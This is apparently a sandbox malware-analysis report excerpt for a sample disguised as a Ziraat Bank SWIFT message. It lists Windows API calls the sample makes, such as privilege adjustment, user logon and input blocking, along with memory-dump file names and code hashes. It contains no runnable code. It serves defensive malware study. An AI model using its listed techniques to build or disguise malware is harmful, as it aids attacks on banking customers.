                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 000BAB99
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000BABAB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                        • Opcode ID: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
                                                                                                                                                        • Instruction ID: 04b3961ea278440d75af0226e5526031f614d9fa705b132e83795be24ba03d1f
                                                                                                                                                        • Opcode Fuzzy Hash: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
                                                                                                                                                        • Instruction Fuzzy Hash: 89E0BF71000511AFEB252F54FC05DB77BE9EB04320711C529B59981871DB625C90AB50
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000A6DB3,-0000031A,?,?,00000001), ref: 000A81B1
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000A81BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
                                                                                                                                                        • Instruction ID: 684153c2a5f497eedbaccde46d546351dda4dde0bba9572b153a1b63fc106902
                                                                                                                                                        • Opcode Fuzzy Hash: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
                                                                                                                                                        • Instruction Fuzzy Hash: 0FB092B1044608ABDB002BE1FC0AB587F68FB08652F004010F64D488618BB254908A92
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3728558374-2766056989
                                                                                                                                                        • Opcode ID: 659ca0f5d19a930d04a0e02c33a5d313d5485356da9f41b40e586f6145f9c7de
                                                                                                                                                        • Instruction ID: bfe3db54d5d0fd55ce428daf3d8714d863ab40d77f45336b9b0e961e9dc7ebda
                                                                                                                                                        • Opcode Fuzzy Hash: 659ca0f5d19a930d04a0e02c33a5d313d5485356da9f41b40e586f6145f9c7de
                                                                                                                                                        • Instruction Fuzzy Hash: DA728C74E042099BCF24DF94C491EBEB7B5FF48300F14806AE919AB292D771AE45EB91
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
                                                                                                                                                        • Instruction ID: e521fee8e160b0960b334302af2041a542d41809ad3ae42fc996fe01e9489f4e
                                                                                                                                                        • Opcode Fuzzy Hash: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
                                                                                                                                                        • Instruction Fuzzy Hash: 7E320322D29F014DD7679634D92233AA299AFB73D4F15D727E81AB5DAAEF38C4C34100
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 674341424-0
                                                                                                                                                        • Opcode ID: aa326f502fbc2c8d378413fe18ffe2d6185b3d73351685f5c81134b0a94858c9
                                                                                                                                                        • Instruction ID: 03076911e19319465a6c679be34300797d9ab1688beadbf16afc01427f3afb5c
                                                                                                                                                        • Opcode Fuzzy Hash: aa326f502fbc2c8d378413fe18ffe2d6185b3d73351685f5c81134b0a94858c9
                                                                                                                                                        • Instruction Fuzzy Hash: DF2275716083059FD724EF24C891BAFB7E4BF84310F14492DF99A9B292DB71E944DB82
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
                                                                                                                                                        • Instruction ID: 794cf5d6216faa8d63e04cf173aad1186727493aba2f3794920b4aacab0de259
                                                                                                                                                        • Opcode Fuzzy Hash: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
                                                                                                                                                        • Instruction Fuzzy Hash: C1B1DF20D2AF518DD32396798931336B65DAFFB2D5B91D71BFC2A74D22EB2185C34180
                                                                                                                                                        APIs
                                                                                                                                                        • __time64.LIBCMT ref: 000CB6DF
                                                                                                                                                          • Part of subcall function 000A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,000CBDC3,00000000,?,?,?,?,000CBF70,00000000,?), ref: 000A3453
                                                                                                                                                          • Part of subcall function 000A344A: __aulldiv.LIBCMT ref: 000A3473
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2893107130-0
                                                                                                                                                        • Opcode ID: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
                                                                                                                                                        • Instruction ID: dc2cd68d2c53ffd86065f0b7ec943c73894531a08cde661421aa3d380c595186
                                                                                                                                                        • Opcode Fuzzy Hash: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
                                                                                                                                                        • Instruction Fuzzy Hash: 6C21DF766345108BC729CF28C881B96B7E0EB95310B248E6CE4E5CB2D0CB38BA45CB54
                                                                                                                                                        APIs
                                                                                                                                                        • BlockInput.USER32(00000001), ref: 000D6ACA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                        • Opcode ID: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
                                                                                                                                                        • Instruction ID: 327dfea28ba216b76649542f7a49b62e65267facf7e2f3511029764572075ce2
                                                                                                                                                        • Opcode Fuzzy Hash: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
                                                                                                                                                        • Instruction Fuzzy Hash: 8FE01A3A200204AFC740EBA9D80499AB7ECAFB8751F058427E985D7391DAB1E8449BA1
                                                                                                                                                        APIs
                                                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000C74DE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: mouse_event
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2434400541-0
                                                                                                                                                        • Opcode ID: 13fea7f4ced5b6f4c4f08cb15c7012e387b3f9d6cb24608e2a64a882f245d211
                                                                                                                                                        • Instruction ID: 29a6a2673a8f6f82a0784ea2940939863bafc53d87ccc9e729711f0a0b06265c
                                                                                                                                                        • Opcode Fuzzy Hash: 13fea7f4ced5b6f4c4f08cb15c7012e387b3f9d6cb24608e2a64a882f245d211
                                                                                                                                                        • Instruction Fuzzy Hash: 53D05EA012C30538EC7D0724DC0FF7E0948F3107C1F80818DB58AC94C2BAC058459832
                                                                                                                                                        APIs
                                                                                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000BAD3E), ref: 000BB124
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LogonUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1244722697-0
                                                                                                                                                        • Opcode ID: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
                                                                                                                                                        • Instruction ID: 055750e413a0190fc865d7da9952dc2ae4d1c9eb7b6527b81cdc3031b4c013ed
                                                                                                                                                        • Opcode Fuzzy Hash: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
                                                                                                                                                        • Instruction Fuzzy Hash: D4D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408110FA15C50A0C671D531AB50
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000A818F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
                                                                                                                                                        • Instruction ID: 0b74dae6d05fc59afbec53bb508ddd155c62ea851152eacc41895cb42d876645
                                                                                                                                                        • Opcode Fuzzy Hash: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
                                                                                                                                                        • Instruction Fuzzy Hash: 94A0223000030CFBCF002FC2FC0A8883F2CFB002A0B000020F80C08830CBB3A8A08AC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a73c9f38a445beaac03339ea57b0e4bffccf49f6ec81eb59f8cf27fba3caef0a
                                                                                                                                                        • Instruction ID: 458dc1d410e6887e5ab0bab12c2a26e39f727a74f4cb4f4b733bda3d265cacd8
                                                                                                                                                        • Opcode Fuzzy Hash: a73c9f38a445beaac03339ea57b0e4bffccf49f6ec81eb59f8cf27fba3caef0a
                                                                                                                                                        • Instruction Fuzzy Hash: 6B22C070A0424ACFDB64EF58C480ABEB7F0FF14314F148069E99A9B352E735AD81DB91
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
                                                                                                                                                        • Instruction ID: 0b0614ca7e2ad32f2b261e9057020a5611a2f3aa5267a81f883bbc4b3892ea77
                                                                                                                                                        • Opcode Fuzzy Hash: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
                                                                                                                                                        • Instruction Fuzzy Hash: 84127970A00609ABDF14EFA4D985AFEB7F5FF48300F148529E846E7651EB36AD20DB50
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3728558374-0
                                                                                                                                                        • Opcode ID: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
                                                                                                                                                        • Instruction ID: 1e85824fb2ad3c8c11b73b414cb2e5a40c1ba5ab19256afa9a5cef8325f9973d
                                                                                                                                                        • Opcode Fuzzy Hash: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
                                                                                                                                                        • Instruction Fuzzy Hash: 6802C070A00209DBCF14EF68D981ABEBBF5FF44300F108069E946DB296EB35DA11DB91
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction ID: ebf3ee9f3efa05828d28598af8b52ebc6441acfa97a721e45383a00846bec41e
                                                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction Fuzzy Hash: 5BC1B2322051A70ADFAD467AC47453EFAE15BA3BB531A076DD8B3CB4D5EF20C524E620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction ID: 6c6e10a3284589984336f536da49f9101625a1850fe55b6015156a9dc336fa96
                                                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction Fuzzy Hash: DDC1A0322091970AEFAD467AC43453EBAE15BA3BB131A076DD4B3CB4D5EF20D524E620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction ID: 210e185b9782a8ac592dfa8e839a071ec9e0034c88333d32d32b1eec66618c09
                                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction Fuzzy Hash: 66C191322051970ADFAD863AC43453EBAE15FA2BB171A077DD4B3CB5E5EF20C564E620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
